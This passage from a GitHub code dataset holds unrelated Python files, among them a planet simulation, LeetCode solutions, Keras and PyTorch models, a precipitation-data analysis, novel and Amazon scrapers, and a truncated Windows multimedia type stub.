= Planet(-19.8 * Planet.AU, 0, 30, BLUE, 8.681 * 10**25)\r\n uranus.vel_y = 6.08 * 1000\r\n neptune = Planet(-30 * Planet.AU, 0, 30, 'blue', 1.024 * 10**26)\r\n neptune.vel_y = 5.43 * 1000\r\n\r\n planets = [sun, mercury, venus, earth, mars, jupiter, saturn, uranus, neptune]\r\n\r\n while True:\r\n # event loop\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n # scale\r\n if event.key == pygame.K_UP:\r\n Planet.SCALE += 5 / Planet.AU\r\n elif event.key == pygame.K_DOWN:\r\n Planet.SCALE -= 5 / Planet.AU\r\n \r\n # timestep\r\n if event.key == pygame.K_RIGHT:\r\n Planet.TIMESTEP += 3600 * 24\r\n elif event.key == pygame.K_LEFT:\r\n Planet.TIMESTEP -= 3600 * 24\r\n \r\n screen.fill('black')\r\n\r\n for planet in planets:\r\n if not planet.sun: planet.update_pos(planets)\r\n planet.draw(screen)\r\n\r\n pygame.display.update() \r\n clock.tick(FPS)\r\n\r\nmain()","repo_name":"AryenSinghal/Planets-Simulation","sub_path":"plenets.py","file_name":"plenets.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4902758054","text":"import random\n\n\ndef eight_ball():\n \"\"\"\n Magic eight ball.\n\n :return: A random answer.\n :rtype: str\n \"\"\"\n answers = [\n 'It is certain', 'It is decidedly so', 'without a doubt', 'Yes definitely',\n 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good',\n 'Yes', 'Signs point to yes', 'Reply hazy try again', 'Ask again later',\n 'Better not tell you now', 'Cannot predict now', 'Concentrate and ask again',\n 'Don\\'t count on it', 'My reply is no', 'My sources say no', 'Outlook not so good',\n 'Very doubtful'\n ]\n return random.choice(answers)\n\n\ndef flip_coin():\n \"\"\"\n Flip a coin.\n\n :return: Heads or tails.\n :rtype: str\n \"\"\"\n coin = ['heads', 'tails']\n return random.choice(coin)\n\n\ndef roll_dice():\n \"\"\"\n Roll a 6 sided dice.\n\n :return: A number between 1 and 6.\n :rtype: str\n \"\"\"\n numbers = ['1', '2', '3', '4', '5', '6']\n return 
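A sanity check of the attraction formula used above (F = G·m1·m2 / r²), with standard Sun and Earth values taken from this file's main(); the expected magnitude is a well-known physical figure, not computed by the repo itself:

    G = 6.67428e-11                       # same G as the Planet class
    m_sun, m_earth = 1.9891e30, 5.97219e24
    r = 1.496e11                          # 1 AU in metres
    F = G * m_sun * m_earth / r**2
    print(f"{F:.3e} N")                   # ~3.543e+22 N, the known Sun-Earth pull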
random.choice(numbers)\n","repo_name":"nortxort/nortbot","sub_path":"apis/locals_.py","file_name":"locals_.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"15003404084","text":"# Problem:\n# Given an array containing n distinct numbers taken from 0, 1, 2, ..., n, find the one that is missing from the array. \n\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n for elm,expected in zip(sorted(nums),list(range(max(nums)+1))):\n if elm != expected:\n return(expected)\n return(elm+1)","repo_name":"OhMesch/Algorithm-Problems","sub_path":"268-Missing-Number.py","file_name":"268-Missing-Number.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19582429680","text":"def all_even(number_list):\n \"\"\"Return a list of only the even numbers in the input list.\n\n >>> all_even([2, 6, -1, -2])\n [2, 6, -2]\n\n >>> all_even([-1, 3, 5])\n []\n\n \"\"\"\n for num in number_list[:]:\n if num % 2 != 0:\n number_list.remove(num)\n return number_list\n #return ['the wrong thing']\n\nprint (all_even([2, 6, -1, -2]))\nprint (all_even([-1, 3, 5]))","repo_name":"Geeksten/week1_skills-assessment","sub_path":"all_even.py","file_name":"all_even.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10657103902","text":"import numpy as np\nfrom gensim.models import KeyedVectors\nfrom conllu import parse\nfrom sklearn.metrics import log_loss\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Input, LSTM, Bidirectional, Flatten\nfrom keras.optimizers import SGD\nfrom sklearn.preprocessing import label_binarize \n\ndef prepare_data(filename):\n with open(filename, 'r', encoding='utf-8') as f:\n data = f.read()\n trees = parse(data)\n return get_data(trees)\n\ndef process_tree(tree):\n processed_tree = {}\n for word in tree:\n processed_tree[word[\"id\"]] = [word[\"lemma\"].lower(), word[\"head\"], word[\"deprel\"]]\n return processed_tree \n\ndef get_data(trees):\n features, labels = [], []\n for tree in trees:\n processed_tree = process_tree(tree)\n for key, value in processed_tree.items():\n word_lem = value[0]\n head_id = value[1] \n head_lem = processed_tree[head_id][0] if head_id != 0 else \"\"\n dep = value[2]\n if (word_lem in gensim_model and head_lem in gensim_model): \n head_vector = gensim_model[head_lem] if head_id != 0 else np.zeros(300)\n features.append(np.append(head_vector, gensim_model[word_lem]))\n labels.append(dep)\n return np.array(features), labels\n\nprint(\"Load Vectors\")\ngensim_model = KeyedVectors.load_word2vec_format(\"fiction.lowercased.lemmatized.300d\")\nprint(\"Load Train Data\")\ntrain_features, train_labels = prepare_data('uk_iu-ud-train.conllu')\nprint(\"Load Test Data\")\ntest_features, test_labels = prepare_data('uk_iu-ud-test.conllu')\n\nprint(\"Binarize Labels\")\nlabels_dict = {x: 1 for x in train_labels + test_labels}\nlabels_list = [key for key, value in labels_dict.items()]\n\ntrain_labels = label_binarize(train_labels, classes=labels_list)\ntest_labels = label_binarize(test_labels, classes=labels_list)\n\n\nprint(\"Build Keras Model\")\n# LSTM network\ninputs = Input(shape=(600,1))\n\nx = Bidirectional(LSTM(64, return_sequences=True),\n merge_mode='concat')(inputs)\nx = 
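The zip-over-sorted approach in the 268-Missing-Number record above is O(n log n); a common O(n) alternative uses the arithmetic-series sum n(n+1)/2 (a well-known variant, not the author's code):

    def missing_number(nums):
        n = len(nums)
        # sum of 0..n minus the actual sum leaves exactly the missing value
        return n * (n + 1) // 2 - sum(nums)

    assert missing_number([3, 0, 1]) == 2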
Dropout(0.2)(x)\nx = Flatten()(x)\noutputs = Dense(len(labels_list), activation='softmax')(x)\n\nkeras_model = Model(inputs=inputs, outputs=outputs, name='LSTM')\ntrain_features = np.expand_dims(train_features, axis=2)\ntest_features = np.expand_dims(test_features, axis=2)\n\nprint(\"Compile Keras Model\")\n# Compile the model\nsgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\nkeras_model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['acc'])\n\n# Define number of epochs\nepochs = 15\n\nprint(\"Fit Model\")\n\n# Fit the model to the training data\nestimator = keras_model.fit(train_features, train_labels, validation_split=0.2, epochs=epochs, batch_size=128, verbose=1)\n\nprint(\"Training accuracy: %.2f%% / Validation accuracy: %.2f%%\" % \n (100*estimator.history['acc'][-1], 100*estimator.history['val_acc'][-1]))\n\nprint(\"Make Prediction\")\n# Make predictions\npredicted_prob = keras_model.predict(test_features)\n\n# Report log loss and score\nloss_sk = log_loss(test_labels, predicted_prob)\nprint('Log loss is: {}'.format(loss_sk))","repo_name":"sudodoki/prj-nlp","sub_path":"students/anastasiia_nutsa/11/UDepParser.pyw","file_name":"UDepParser.pyw","file_ext":"pyw","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37004701567","text":"#coding:utf-8\nimport requests\nimport threading\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nimport time\nimport sys\n\n\n# request header dictionary\nreq_header={\n\n\n'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n'Accept-Encoding':'gzip, deflate',\n'Accept-Language':'zh-CN,zh;q=0.8',\n'Cache-Control':'max-age=0',\n'Connection':'keep-alive',\n'Cookie':'UM_distinctid=16168fde09f26b-0537c19fda550a-6b1b1279-13c680-16168fde0a0579; CNZZDATA1262370505=1455279024-1517880909-https%253A%252F%252Fwww.baidu.com%252F%7C1517978164',\n'Host':'www.xxbiquge.com',\n'If-Modified-Since':'Fri, 01 Dec 2017 12:56:21 GMT',\n'If-None-Match':'W/\"5a215175-19f8e\"',\n'Referer':'https://www.baidu.com/link?url=CKL6orNW3U0_kvak-7yrwW17WQdCS2PoTROZY4-UrIHipK9UsFPQOYqoZSq5Ucnl&wd=&eqid=ddcc05780001ebac000000065a7a846a',\n'Upgrade-Insecure-Requests':'1',\n'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',\n\n}\n\n\nreq_url_base='https://www.xxbiquge.com/' # base URL of the novel site\n\n# novel download function\n# txt_id: novel id\n# keys of the txt dict:\n# id: novel id\n# title: novel title\n# first_page: first chapter page\n# txt_section: chapter address\n# section_name: chapter name\n# section_text: chapter body text\n# section_ct: number of chapter pages\ndef get_txt(txt_id):\n txt={}\n txt['title']=''\n txt['id']=str(txt_id)\n try:\n #print(\"Enter the id of the novel to download:\")\n #txt['id']=input()\n req_url=req_url_base+ txt['id']+'/' # build the novel URL from its id\n print(\"Novel id: \"+txt['id'])\n res=requests.get(req_url,headers=req_header) # fetch the table-of-contents page (headers=, not params=)\n res.encoding='utf-8' # set the page encoding explicitly; usually not needed\n soups=BeautifulSoup(res.text,\"html.parser\") # parse with BeautifulSoup\n # get the novel title\n txt['title']=soups.select('#wrapper .box_con #maininfo #info h1')[0].text\n txt['author']=soups.select('#wrapper .box_con #maininfo #info p')\n # get the last update time\n txt['update']=txt['author'][2].text\n # get the name of the most recently updated chapter\n txt['lately'] = txt['author'][3].text\n # get the author\n txt['author']=txt['author'][0].text\n # get the synopsis\n txt['intro']=soups.select('#wrapper .box_con #maininfo #intro')[0].text.strip()\n print(\"Id: \"+'{0:0>8} '.format(txt['id'])+ \"Novel 《\"+txt['title']+\"》 download started.\")\n print(\"Looking for the first chapter page...\")\n # get info for all chapters\n first_page=soups.select('#wrapper .box_con #list dl dd a')\n # get the total number of chapter pages\n 
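For the UDepParser record above, label_binarize one-hot encodes each dependency relation against a fixed label list; a tiny illustration with toy labels (not the real deprel inventory):

    from sklearn.preprocessing import label_binarize

    print(label_binarize(["nsubj", "obj"], classes=["nsubj", "obj", "amod"]))
    # [[1 0 0]
    #  [0 1 0]]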
section_ct=len(first_page)\n # get the address of the first chapter page\n first_page = first_page[0]['href'].split('/')[2]\n print(\"Number of chapter pages: \"+str(section_ct))\n print(\"First chapter address found: \"+ first_page)\n # set the chapter page to download now\n txt_section=first_page\n # open the output file and write the novel metadata\n fo = open('{0:0>8}-{1}.txt.download'.format(txt['id'],txt['title']), \"ab+\")\n fo.write((txt['title']+\"\\r\\n\").encode('UTF-8'))\n fo.write((txt['author'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((txt['update'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((txt['lately'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((\"*******Synopsis*******\\r\\n\").encode('UTF-8'))\n fo.write((\"\\t\"+txt['intro'] + \"\\r\\n\").encode('UTF-8'))\n fo.write((\"******************\\r\\n\").encode('UTF-8'))\n # enter the loop, writing each chapter's content\n while(1):\n try:\n # request the current chapter page\n r=requests.get(req_url+str(txt_section),headers=req_header)\n r.encoding='utf-8' # set the page encoding explicitly; usually not needed\n # parse with BeautifulSoup\n soup=BeautifulSoup(r.text,\"html.parser\")\n # get the chapter name\n section_name=soup.select('#wrapper .content_read .box_con .bookname h1')[0]\n section_text=soup.select('#wrapper .content_read .box_con #content')[0]\n # get the chapter text\n section_text=re.sub( '\\s+', '\\r\\n\\t', section_text.text).strip('\\r\\n')#\n # get the address of the next chapter\n txt_section=soup.select('#wrapper .content_read .box_con .bottem2 a')[2]['href'].split('/')[2]\n # if this is the last chapter, the \"next\" link points back to the TOC, so break out of the loop\n if(txt_section==''):\n print(\"Id: \"+'{0:0>8} '.format(txt['id'])+ \"Novel 《\"+txt['title']+\"》 download finished\")\n break\n # write the chapter title in binary mode\n fo.write((\"\\r\\n\"+section_name.text+\"\\r\\n\").encode('UTF-8'))\n # write the chapter body in binary mode\n fo.write((section_text+'\\r\\n').encode('UTF-8'))\n print(txt['title']+' chapter: '+section_name.text+' downloaded')\n print(txt_section)\n except:\n print(\"Id: \"+'{0:0>8} '.format(txt['id'])+ \"Novel 《\"+txt['title']+\"》 chapter download failed, retrying.\")\n fo.close()\n os.rename('{0:0>8}-{1}.txt.download'.format(txt['id'],txt['title']), '{0:0>8}-{1}.txt'.format(txt['id'],txt['title']))\n except: # on error, write the message to dowload.log and also print it\n fo_err = open('dowload.log', \"ab+\")\n try:\n fo_err.write(('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]: Id: \" + '{0:0>8} '.format(txt['id']) + \"Novel 《\" + txt['title'] + \"》 download failed.\\r\\n\").encode('UTF-8'))\n print('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]: Id: \"+'{0:0>8} '.format(txt['id'])+ \"Novel 《\"+txt['title']+\"》 download failed.\")\n os.rename('{0:0>8}'.format(txt['id']) + '-' + txt['title'] + '.txt.download',\n '{0:0>8}'.format(txt['id']) + '-' + txt['title'] + '.txt.error')\n except:\n fo_err.write(('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]: Id: \"+'{0:0>8} '.format(txt['id'])+\"download failed.\\r\\n\").encode('UTF-8'))\n print('['+time.strftime('%Y-%m-%d %X', time.localtime())+\"]: Id: \"+'{0:0>8} '.format(txt['id'])+\"download failed.\")\n finally: # close the file\n fo_err.close()\n\n# the id of the novel to download; how to find the id is explained above.\n# get_txt('20_20069')\n\nget_txt(\"79_79938\")","repo_name":"perennisY/python","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71910632857","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\n\nclass LogisticRegression(torch.nn.Module):\n def __init__(self, input_dim, output_dim):\n super(LogisticRegression, self).__init__()\n self.linear = torch.nn.Linear(input_dim, output_dim)\n\n def forward(self, x):\n outputs = self.linear(x)\n return outputs\n\nclass FC2(torch.nn.Module):\n def __init__(self, input_dim, output_dim, dropout, dropout_p=0.5):\n super(FC2, self).__init__()\n self.fc1 = 
torch.nn.Linear(input_dim, 512)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(512, output_dim)\n self.apply_dropout = dropout\n self.dropout = torch.nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.dropout(x)\n outputs = self.fc2(x)\n return outputs\n \n \nclass FC4(torch.nn.Module):\n def __init__(self, input_dim, output_dim, dropout, dropout_p=0.5):\n super(FC4, self).__init__()\n self.fc1 = torch.nn.Linear(input_dim, 512)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(512, 512)\n self.fc3 = torch.nn.Linear(512, 512)\n self.fc4 = torch.nn.Linear(512, output_dim)\n self.apply_dropout = dropout\n self.do1 = torch.nn.Dropout(dropout_p)\n self.do2 = torch.nn.Dropout(dropout_p)\n self.do3 = torch.nn.Dropout(dropout_p)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do1(x)\n x = self.fc2(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do2(x)\n x = self.fc3(x)\n x = self.relu(x)\n if self.apply_dropout:\n x = self.do3(x)\n outputs = self.fc4(x)\n return outputs","repo_name":"hechmik/voxceleb_enrichment_age_gender","sub_path":"notebooks/src/gender_classifiers.py","file_name":"gender_classifiers.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"68"} +{"seq_id":"35158412122","text":"from config import opt\n\nfrom keras import *\nfrom keras.optimizers import *\n\nfrom utils import *\n\ndef siamese_rnn(embedding_matrix,is_use_word):\n if is_use_word: text_len = opt.MAX_WORD_SEQUENCE_LENGTH\n else: text_len = opt.MAX_CHAR_SEQUENCE_LENGTH\n\n embedding_layer = Embedding( len(embedding_matrix),\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=text_len,\n trainable=False)\n\n norm = BatchNormalization()\n\n q1_input = Input(shape=(text_len,), dtype=\"int32\")\n q1 = embedding_layer(q1_input)\n q1 = norm(q1)\n q1_embed = SpatialDropout1D(0.3)(q1)\n\n\n q2_input = Input(shape=(text_len,), dtype=\"int32\")\n q2 = embedding_layer(q2_input)\n q2 = norm(q2)\n q2_embed = SpatialDropout1D(0.3)(q2)\n\n # char_bilstm_layer1 = Bidirectional(LSTM(300, return_sequences=True),merge_mode='sum')\n # char_bilstm_layer2 = Bidirectional(LSTM(300, return_sequences=True),merge_mode='sum')\n char_bilstm_layer1 = Bidirectional(CuDNNLSTM(300, return_sequences=True),merge_mode='sum')\n char_bilstm_layer2 = Bidirectional(CuDNNLSTM(300, return_sequences=True),merge_mode='sum')\n\n q1_temp,q2_temp = char_bilstm_layer1(q1_embed),char_bilstm_layer1(q2_embed)\n q1,q2 = char_bilstm_layer2(q1_temp),char_bilstm_layer2(q2_temp)\n\n merged_max = pool_corr(q1, q2, 'max', 'jaccard')\n merged_ave = pool_corr(q1, q2, 'ave', 'jaccard')\n\n # features_input = Input(shape=[features_train.shape[1]], dtype='float')\n # features_dense = BatchNormalization()(features_input)\n # features_dense = Dropout(0.3)(Dense(1024, activation='relu')(features_dense))\n # features_dense = BatchNormalization()(features_dense)\n # features_dense = Dense(512, activation='relu')(features_dense)\n\n features = Input(shape=(5,), dtype=\"float32\")\n\n merged = concatenate([merged_ave,merged_max,features])\n # merged = Dropout(0.2)(merged)\n # merged = BatchNormalization()(merged)\n merged = Dense(512,activation='relu')(merged)\n merged = Dense(512,activation='relu')(merged)\n output = Dense(1, activation='sigmoid')(merged)\n\n lr=0.0002\n\n model = Model(inputs=[q1_input,q2_input,features], 
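A minimal forward pass through the FC2 head defined above; the input/output sizes are arbitrary illustration values:

    import torch

    model = FC2(input_dim=20, output_dim=2, dropout=True)
    x = torch.randn(4, 20)        # batch of 4 feature vectors
    logits = model(x)
    print(logits.shape)           # torch.Size([4, 2])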
outputs=output)\n\n model.compile(loss='binary_crossentropy',optimizer=Nadam(lr),metrics=['binary_crossentropy','accuracy',f1])\n # model.load_weights(\"./data/weights_best_0.0008.hdf5\")\n\n return model","repo_name":"Typistzhao/chip2018","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15230601479","text":"# -*- coding: utf-8 -*-\n\"\"\" Description\nReading precipitation data.\nCompiled files of CR2 observational data \n\nWebsite: http://www.cr2.cl/datos-de-precipitacion/\nFile: cr2_prDaily_2018_ghcn.zip\n\nJosé Ignacio Saldías \njose.saldias@cigiden.cl\n\"\"\"\n\n# =============================================================================\n# Required dependencies\n# =============================================================================\n\n# Included in python\nimport os\nimport time\n\n# Installed via Anaconda\nimport numpy as np\nimport pandas as pd\n\n# =============================================================================\n# Directory handling\n# =============================================================================\n\n# Names\ndir_loc = os.getcwd() # local directory\nn_archivo = 'cr2_prDaily_2018_ghcn.txt' # file name\n\n# Paths\nr_archivo = os.path.join(dir_loc, n_archivo) # absolute path to the file\n\n\n# =============================================================================\n# General guide for data extraction and initial computations\n# =============================================================================\n\n# Data reading\nprint('\\nReading file: {}'.format(n_archivo)) # progress marker\ninicio = time.process_time() # performance measurement\ndf = pd.read_csv(r_archivo, # path of the file to open\n na_values=[-9999], # -9999 becomes NaN\n index_col = 0, # DataFrame index\n low_memory=False) # used to read mixed datatypes\nprint('Data read in:',round(time.process_time() - inicio, 1),\n 'seconds\\n')\n\n# Summary of all stations\nprint('Summary of all stations:\\n',\n df.iloc[0:14])\n\n# Stations can also be selected by name\ndf.columns = df.loc['nombre'].values\nprint('Stations indexed by name')\n\n# Selection by attribute (e.g. 
stations with latitude between -30 and -35)\ne_filtradas = df.loc['latitud'][(\n df.loc['latitud'].astype(float)<-30)\n & \n (df.loc['latitud'].astype(float)>-35)]\nprint('Stations between latitudes -30 and -35\\n',e_filtradas)\n\n# =============================================================================\n# Quinta Normal example\n# =============================================================================\nprint('\\n===============================================================\\n\\n',\n 'Selecting station Quinta Normal Santiago')\nqta_n = df['Quinta Normal Santiago'].iloc[14::].astype(float) # initial filter\n\n# Selection by dates\nprint('Selecting period 1979-01-01 to 2016-12-31')\nqta_n = qta_n[(qta_n.index >= '1979-01-01') & (qta_n.index <= '2016-12-31')] \n\n# Resampling to annual frequency\nprint('Transforming index for resampling\\n')\nqta_n.index = pd.to_datetime(qta_n.index)\nprint('Resampling data')\nqta_n_s = qta_n.resample('YS').sum()\nqta_n = qta_n.resample('YS').max()\n\n\ndef resumen_estadisticas(df):\n print('Summary statistics')\n media = df.mean()\n mediana = df.median()\n desv = df.std()\n kurtosis = df.kurtosis()\n n_mayores = df.nlargest(10)\n n_menores = df.nsmallest(10)\n \n print('\\n############################\\n',\n '\\nMean:\\t', media,\n '\\nMedian:\\t', mediana,\n '\\nStd dev:\\t', desv,\n '\\nKurtosis:\\t', kurtosis,\n '\\n\\n10 largest:\\n\\t', n_mayores,\n '\\n\\n10 smallest:\\n\\t', n_menores,\n '\\n-----------------------'\n )\n return\n\n# Summary statistics for annual maximum precipitation\nprint('\\n Data resampled to annual maximum precipitation')\nresumen_estadisticas(qta_n)\n\nprint('\\n Data resampled to annual accumulated precipitation')\n# Summary statistics\nresumen_estadisticas(qta_n_s)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"JoseSaldias/Pydraulics","sub_path":"Hidrologia/(Python) Lectura y analisis estaciones CR2/examinacion_estaciones.py","file_name":"examinacion_estaciones.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32179070216","text":"from matplotlib.pyplot import table\r\nimport requests \r\nimport pandas as pd \r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nurl = 'https://www.amazon.it/Philips-hd2581-00-Tostapane-nero/dp/B01N9XBDTI/ref=sr_1_5?__mk_it_IT=%C3%85M%C3%85%C5%BD%C3%95%C3%91&crid=26VHA14FAG6ZX&keywords=toaster&qid=1648288905&sprefix=toaster%2Caps%2C80&sr=8-5&th=1'\r\n\r\ndef scrape_amz_tables(url): \r\n # Use splash to scrape the web \r\n r = requests.get('http://localhost:8050/render.html', params = {'url': url, 'wait':2})\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n\r\n # find the table\r\n table_attrib = soup.find('table', {'id': 'productDetails_techSpec_section_1'})\r\n \r\n col_names = []\r\n dati_tab = []\r\n # iterate along all the columns of the table\r\n for row in table_attrib.tbody.find_all('tr'):\r\n dati = row.text.replace('\u200e', '')\r\n dati = ' '.join(dati.split())\r\n ind_split = dati.find(' ')\r\n col_names.append(dati[:ind_split]) \r\n dati_tab.append(dati[ind_split+1 :]) \r\n\r\n average_rating = float((soup.find('span', {'class' : 'a-icon-alt'}).text).replace(' su 5 stelle', '').replace(',', '.'))\r\n col_names.append('Average Rating')\r\n dati_tab.append(average_rating)\r\n df = pd.DataFrame([dati_tab], columns= col_names)\r\n 
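The 'YS' (year-start) resampling used in the CR2 script above, demonstrated on a toy two-year daily series; the values are made up for illustration:

    import pandas as pd

    s = pd.Series([1.0, 2.0, 3.0, 4.0],
                  index=pd.to_datetime(["2000-01-05", "2000-06-01",
                                        "2001-02-01", "2001-12-31"]))
    print(s.resample("YS").sum())   # 2000: 3.0, 2001: 7.0
    print(s.resample("YS").max())   # 2000: 2.0, 2001: 4.0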
df.to_excel('E:/webscraping/tab_prod.xlsx')\r\n\r\n\r\nscrape_amz_tables(url)","repo_name":"AlbertoDeBenedittis/Amz-reviews-Analysis","sub_path":"product_attributes.py","file_name":"product_attributes.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39180075045","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n pq = deque()\n qq = deque()\n pq.append(p)\n qq.append(q)\n\n while pq and qq:\n x, y = pq.popleft(), qq.popleft()\n if not (x == y == None or x and y and x.val == y.val):\n return False\n if x:\n pq.append(x.left)\n pq.append(x.right)\n if y:\n qq.append(y.left)\n qq.append(y.right)\n return True\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n if p == q == None:\n return True\n if not (p and q and p.val == q.val):\n return False\n\n return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n","repo_name":"Mschikay/leetcode","sub_path":"100. Same Tree.py","file_name":"100. Same Tree.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17896079415","text":"from _typeshed import Incomplete\n\nMAXPNAMELEN: int\nMAXERRORLENGTH: int\nMAX_JOYSTICKOEMVXDNAME: int\nMM_MICROSOFT: int\nMM_MIDI_MAPPER: int\nMM_WAVE_MAPPER: int\nMM_SNDBLST_MIDIOUT: int\nMM_SNDBLST_MIDIIN: int\nMM_SNDBLST_SYNTH: int\nMM_SNDBLST_WAVEOUT: int\nMM_SNDBLST_WAVEIN: int\nMM_ADLIB: int\nMM_MPU401_MIDIOUT: int\nMM_MPU401_MIDIIN: int\nMM_PC_JOYSTICK: int\nTIME_MS: int\nTIME_SAMPLES: int\nTIME_BYTES: int\nTIME_SMPTE: int\nTIME_MIDI: int\nTIME_TICKS: int\nMM_JOY1MOVE: int\nMM_JOY2MOVE: int\nMM_JOY1ZMOVE: int\nMM_JOY2ZMOVE: int\nMM_JOY1BUTTONDOWN: int\nMM_JOY2BUTTONDOWN: int\nMM_JOY1BUTTONUP: int\nMM_JOY2BUTTONUP: int\nMM_MCINOTIFY: int\nMM_WOM_OPEN: int\nMM_WOM_CLOSE: int\nMM_WOM_DONE: int\nMM_WIM_OPEN: int\nMM_WIM_CLOSE: int\nMM_WIM_DATA: int\nMM_MIM_OPEN: int\nMM_MIM_CLOSE: int\nMM_MIM_DATA: int\nMM_MIM_LONGDATA: int\nMM_MIM_ERROR: int\nMM_MIM_LONGERROR: int\nMM_MOM_OPEN: int\nMM_MOM_CLOSE: int\nMM_MOM_DONE: int\nMM_STREAM_OPEN: int\nMM_STREAM_CLOSE: int\nMM_STREAM_DONE: int\nMM_STREAM_ERROR: int\nMM_MOM_POSITIONCB: int\nMM_MIM_MOREDATA: int\nMM_MIXM_LINE_CHANGE: int\nMM_MIXM_CONTROL_CHANGE: int\nMMSYSERR_BASE: int\nWAVERR_BASE: int\nMIDIERR_BASE: int\nTIMERR_BASE: int\nJOYERR_BASE: int\nMCIERR_BASE: int\nMIXERR_BASE: int\nMCI_STRING_OFFSET: int\nMCI_VD_OFFSET: int\nMCI_CD_OFFSET: int\nMCI_WAVE_OFFSET: int\nMCI_SEQ_OFFSET: int\nMMSYSERR_NOERROR: int\nMMSYSERR_ERROR: Incomplete\nMMSYSERR_BADDEVICEID: Incomplete\nMMSYSERR_NOTENABLED: Incomplete\nMMSYSERR_ALLOCATED: Incomplete\nMMSYSERR_INVALHANDLE: Incomplete\nMMSYSERR_NODRIVER: Incomplete\nMMSYSERR_NOMEM: Incomplete\nMMSYSERR_NOTSUPPORTED: Incomplete\nMMSYSERR_BADERRNUM: Incomplete\nMMSYSERR_INVALFLAG: Incomplete\nMMSYSERR_INVALPARAM: Incomplete\nMMSYSERR_HANDLEBUSY: Incomplete\nMMSYSERR_INVALIDALIAS: Incomplete\nMMSYSERR_BADDB: 
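Both isSameTree variants in the record above (the deque-based iterative one and the recursive one) can be exercised the same way; TreeNode is the usual LeetCode class, reconstructed here from the commented definition:

    class TreeNode(object):
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None

    a, b = TreeNode(1), TreeNode(1)
    a.left, b.left = TreeNode(2), TreeNode(2)
    print(Solution().isSameTree(a, b))  # True
    b.left.val = 3
    print(Solution().isSameTree(a, b))  # False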
